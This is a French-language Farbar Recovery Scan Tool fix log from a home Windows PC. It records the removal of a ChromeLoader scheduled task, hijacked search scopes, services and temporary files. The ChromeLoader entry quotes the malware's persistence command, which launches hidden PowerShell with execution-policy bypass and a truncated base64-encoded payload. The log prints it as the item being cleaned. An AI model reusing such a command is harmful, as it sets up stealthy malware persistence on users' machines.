Résultats de correction de Farbar Recovery Scan Tool (x64) Version: 27-12-2021
Exécuté par NzL_O (09-01-2022 23:13:54) Run:1
Exécuté depuis C:\Users\NzL_O\Desktop
Profils chargés: NzL_O
Mode d'amorçage: Normal
==============================================

fixlist contenu:
*****************
CreateRestorePoint:
CloseProcesses:
S2 mccspsvc; "C:\Program Files\Common Files\McAfee\CSP\1.5.471.0\McCSPServiceHost.exe" [X]
S2 nvsvc; "C:\Windows\system32\nvvsvc.exe" [X]
Task: {17ED66E9-4C6A-4B25-ADA8-D8316B351B54} - System32\Tasks\ChromeLoader => cmd /c start /min "" powershell -ExecutionPolicy Bypass -WindowStyle Hidden -E /c start /min "" powershell -ExecutionPolicy Bypass -WindowStyle Hidden -E JABlAHgAdABQAGEAdABoACAAPQAgACIAJAAoACQAZQBuAHYAOgBMAE8AQwBBAEwAQQBQAFAARABBAFQAQQApAFwAYwBoAHIAbwBtAGUAIgAKACQAYwBvAG4AZgBQAGEAdABoACAAPQAgACIAJABlAHgAdABQAGEAdABoAFwAYwBvAG4AZgAuAGoAcwAiAAoAJABhAHIAYwBoAGkAdgBlAE4AYQBtAGUAI (l'élément de données a 4315 caractères en plus). (Pas de fichier)
SearchScopes: HKLM -> {AA9A4890-4262-4441-8977-E2FFCBFB706C} URL = hxxp://fr.yhs4.search.yahoo.com/yhs/search?hspart=acer&hsimp=yhs-acer_001&p={searchTerms}
SearchScopes: HKLM-x32 -> {AA9A4890-4262-4441-8977-E2FFCBFB706C} URL = hxxp://fr.yhs4.search.yahoo.com/yhs/search?hspart=acer&hsimp=yhs-acer_001&p={searchTerms}
SearchScopes: HKU\S-1-5-21-1677540230-3073805055-3309549447-1001 -> DefaultScope {31D9C6F3-7BE8-4D82-B82A-C84A1E0CAFE5} URL =
SearchScopes: HKU\S-1-5-21-1677540230-3073805055-3309549447-1001 -> {31D9C6F3-7BE8-4D82-B82A-C84A1E0CAFE5} URL =
SearchScopes: HKU\S-1-5-21-1677540230-3073805055-3309549447-1001 -> {719CE0F4-9739-45B7-A8F0-F10F849CBAB9} URL =
SearchScopes: HKU\S-1-5-21-1677540230-3073805055-3309549447-1001 -> {AA9A4890-4262-4441-8977-E2FFCBFB706C} URL = hxxp://fr.yhs4.search.yahoo.com/yhs/search?hspart=acer&hsimp=yhs-acer_001&p={searchTerms}
AlternateDataStreams: C:\Users\NzL_O\Application Data:fc7b7d0f14c2a9475ac28a6ca7e82bc5 [394]
AlternateDataStreams: C:\Users\NzL_O\AppData\Roaming:fc7b7d0f14c2a9475ac28a6ca7e82bc5 [394]
Task: {990840B6-1D29-4796-8B6E-5633AB46887E} - System32\Tasks\Avast SecureLine => C:\Program Files\AVAST Software\SecureLine\SecureLine.exe /nogui (Pas de fichier)
2022-01-07 20:58 - 2022-01-07 20:58 - 000012830 _____ C:\WINDOWS\system32\Tasks\ChromeLoader
EmptyTemp:
*****************

Le Point de restauration a été créé avec succès.
Processus fermé avec succès.
HKLM\System\CurrentControlSet\Services\mccspsvc => supprimé(es) avec succès
mccspsvc => service supprimé(es) avec succès
HKLM\System\CurrentControlSet\Services\nvsvc => supprimé(es) avec succès
nvsvc => service supprimé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{17ED66E9-4C6A-4B25-ADA8-D8316B351B54}" => supprimé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{17ED66E9-4C6A-4B25-ADA8-D8316B351B54}" => supprimé(es) avec succès
C:\WINDOWS\System32\Tasks\ChromeLoader => déplacé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\ChromeLoader" => supprimé(es) avec succès
HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{AA9A4890-4262-4441-8977-E2FFCBFB706C} => supprimé(es) avec succès
HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\{AA9A4890-4262-4441-8977-E2FFCBFB706C} => supprimé(es) avec succès
"HKU\S-1-5-21-1677540230-3073805055-3309549447-1001\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\\DefaultScope" => supprimé(es) avec succès
HKU\S-1-5-21-1677540230-3073805055-3309549447-1001\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{31D9C6F3-7BE8-4D82-B82A-C84A1E0CAFE5} => supprimé(es) avec succès
HKU\S-1-5-21-1677540230-3073805055-3309549447-1001\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{719CE0F4-9739-45B7-A8F0-F10F849CBAB9} => supprimé(es) avec succès
HKU\S-1-5-21-1677540230-3073805055-3309549447-1001\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{AA9A4890-4262-4441-8977-E2FFCBFB706C} => supprimé(es) avec succès
C:\Users\NzL_O\Application Data => ":fc7b7d0f14c2a9475ac28a6ca7e82bc5" ADS supprimé(es) avec succès
"C:\Users\NzL_O\AppData\Roaming" => ":fc7b7d0f14c2a9475ac28a6ca7e82bc5" ADS non trouvé(e).
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{990840B6-1D29-4796-8B6E-5633AB46887E}" => supprimé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{990840B6-1D29-4796-8B6E-5633AB46887E}" => supprimé(es) avec succès
C:\WINDOWS\System32\Tasks\Avast SecureLine => déplacé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Avast SecureLine" => supprimé(es) avec succès
"C:\WINDOWS\system32\Tasks\ChromeLoader" => non trouvé(e)

=========== EmptyTemp: ==========

BITS transfer queue => 1310720 B
DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 22195730 B
Java, Flash, Steam htmlcache => 57332288 B
Windows/system/drivers => 519854 B
Edge => 0 B
Chrome => 901775319 B
Firefox => 27878371 B
Opera => 0 B

Temp, IE cache, history, cookies, recent:
Default => 0 B
ProgramData => 0 B
Public => 0 B
systemprofile => 0 B
systemprofile32 => 0 B
LocalService => 25770 B
NetworkService => 75444 B
NzL_O => 98267228 B

RecycleBin => 9433776 B
EmptyTemp: => 1 GB données temporaires supprimées.

================================

Le système a dû redémarrer.

==== Fin de Fixlog 23:16:37 ====